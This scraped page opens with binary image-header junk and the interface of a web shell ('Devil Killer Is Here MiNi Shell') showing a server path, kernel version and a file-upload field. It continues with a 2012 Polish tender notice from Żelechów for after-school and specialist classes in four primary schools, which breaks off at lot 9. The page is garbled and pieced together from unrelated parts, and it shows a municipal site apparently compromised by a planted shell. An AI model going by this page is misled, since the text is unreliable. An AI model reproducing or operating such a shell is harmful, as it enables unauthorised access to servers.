JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/22132-N-2012.html

<p class="kh_header"><b>Żelechów: Prowadzenie zajęć pozalekcyjnych, dydaktyczno - wyrównawczych, specjalistycznych w 4 szkołach z terenu gminy Żelechów w ramach projektu Efektywna edukacja - nasz cel, twoja przyszłość. Program rozwojowy szkół podstawowych gminy Żelechów w ramach Priorytetu IX, Działania 9.1, Poddziałania 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki 2007 - 2013, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 22132 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Żelechowie , ul. Piłsudskiego 47, 08-430 Żelechów, woj. mazowieckie, tel. 025 7541189, faks 025 7541144.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zelechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć pozalekcyjnych, dydaktyczno - wyrównawczych, specjalistycznych w 4 szkołach z terenu gminy Żelechów w ramach projektu Efektywna edukacja - nasz cel, twoja przyszłość. Program rozwojowy szkół podstawowych gminy Żelechów w ramach Priorytetu IX, Działania 9.1, Poddziałania 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki 2007 - 2013, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie zajęć pozalekcyjnych, dydaktyczno - wyrównawczych, specjalistycznych w 4 szkołach z terenu gminy Żelechów w ramach projektu Efektywna edukacja - nasz cel, twoja przyszłość. Program rozwojowy szkół podstawowych gminy Żelechów współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Kapitał Ludzki.

Przedmiot zamówienia został podzielony na części i grupy opisane w pkt. I.2 SIWZ, w związku z czym Zamawiający dopuszcza składanie ofert częściowych na dowolna liczbę części bądź grup.
Części zamówienia:
Część 1. Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Żelechowie
Część 2. Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Starym Kębłowie
Część 3. Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Starym Goniwilku
Część 4. Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Stefanowie
Część 5. Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Żelechowie
Część 6. Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Starym Kębłowie
Część 7. Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Starym Goniwilku
Część 8. Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Stefanowie
Część 9. Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Żelechowie
Część 10. Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Starym Kębłowie
Część 11. Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Starym Goniwilku
Część 12. Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Stefanowie
Część 13. Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Żelechowie.
Część 14. Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Starym Kębłowie
Część 15. Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Starym Goniwilku
Część 16. Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Stefanowie
Część 17. Zajęcia pozalekcyjne z przyrody w Szkole Podstawowej w Starym Goniwilku
Część 18. Zajęcia pozalekcyjne z przyrody w Szkole Podstawowej w Stefanowie
Część 19. Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Żelechowie
Część 20. Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Starym Kębłowie
Część 21. Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Starym Goniwilku
Część 22. Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Stefanowie 
Część 23. Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Żelechowie
Część 24. Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Starym Kębłowie 
Część 25. Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Starym Goniwilku
Część 26. Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Stefanowie
Część 27. Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Żelechowie
Część 28. Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Starym Kębłowie
Część 29. Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Starym Goniwilków
Część 30. Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Stefanowie
Część 31. Doradztwo i opieka pedagogiczno-psychologiczna w Szkole Podstawowej w Starym Kębłowie
Część 32. Doradztwo i opieka pedagogiczno-psychologiczna w Szkole Podstawowej w Stefanowie
Cel zajęć dotyczy wszystkich części zamówienia:
Realizacja zajęć przyczyni się do wzrostu kompetencji kluczowych uczniów i uczennic w zakresie języka polskiego, angielskiego, informatyki, matematyki, przyrody; przyczyni się do wzrostu ogólnych funkcji poznawczych wśród uczniów i uczennic klas I-III wpłynie na rozwój funkcji psychopoznawczych i zniweluje trudności emocjonalne wśród uczniów i uczennic wykazujących problem w nauce lub posiadających orzeczone dysfunkcje.

Czas trwania zajęć (dotyczy wszystkich części zamówienia):
zajęcia prowadzone będą od dnia podpisania umowy do 31.12.2012 bądź do czasu zakończenia projektu.
 
Miejsca realizacji zamówienia:

1.Szkoła Podstawowa im. Romualda Traugutta w Zespole Szkół w Żelechowie
   ul. Ogrodowa 3, 08-430 Żelechów

2.Szkoła Podstawowa im. Henryka Sienkiewicza w Starym Kębłowie
   Stary Kębłów 23
   08-430 Żelechów

3.Szkoła Podstawowa im. ks. Jana Twardowskiego w Starym Goniwilku
  Stary Goniwilk 41 
  08-430 Żelechów

4.Szkoła Podstawowa im. Tadeusza Kościuszki w Zespole Szkół w Stefanowie
  Stefanów 108 
  08-430 Żelechów

Forma realizacji usługi:
Przed lub po obowiązkowych zajęciach dydaktycznych w dni powszednie, tj. od poniedziałku do piątku, według ustalonego harmonogramu opisanego w poszczególnych częściach zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od żądania wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonywania zamówienia wykonawca musi wykazać się dysponowaniem osobami, które będą prowadziły zajęcia, posiadające kwalifikacje zgodne z Rozporządzeniem Ministra 	Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli i niemających wyższego wykształcenia lub ukończenia zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400) oraz doświadczenie w prowadzeniu zajęć w szkole podstawowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferta, stanowiący załącznik nr 1.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zleceniodawca dopuszcza możliwość zmiany postanowień umowy w zakresie:
kadry dydaktycznej w przypadku wystąpienia okoliczności niezależnych od Zleceniodawcy
zmiany harmonogramu zajęć zgodnie z postanowieniami umowy
liczby uczestników zajęć i ich imiennego wykazu w sytuacjach, których nie mógł przewidzieć w chwili zawarcia umowy, niezależnych od Zleceniodawcy
sposobu oraz terminów rozliczeń oraz terminów płatności, w przypadku wystąpienia okoliczności niezależnych od Zleceniobiorcy wynikającym ze zmian obowiązujących przepisów prawnych
wynikającym ze zmian wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia
będącym następstwem siły wyższej
zmiany terminu realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zelechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Żelechowie, ul. Piłsudskiego 47, 08-430 Żelechów pok. nr 9 w godz: 8.00-16:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2012 godzina 11:00, miejsce: Oferty należy składać w siedzibie zamawiającego w pok. nr 14 sekretariat Urzędu Miejskiego w Żelechowie, ul. Piłsudskiego 47, 08-430 Żelechów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Priorytet IX, Działania 9.1, Poddziałania 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki 2007 - 2013, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Żelechowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
90 uczniów, 11 grup, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 660 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram zajęć został określony w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
16 uczniów, 2 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram zajęć został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
32 uczniów, 4 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 240 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka polskiego w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
16 uczniów, 2 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Żelechowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
70 uczniów, 8 grup, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 480 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
13 uczniów, 2 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
24 uczniów, 3 grupa, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 180 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia pozalekcyjne z języka angielskiego w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
13 uczniów, 2 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Żelechowie.</p>
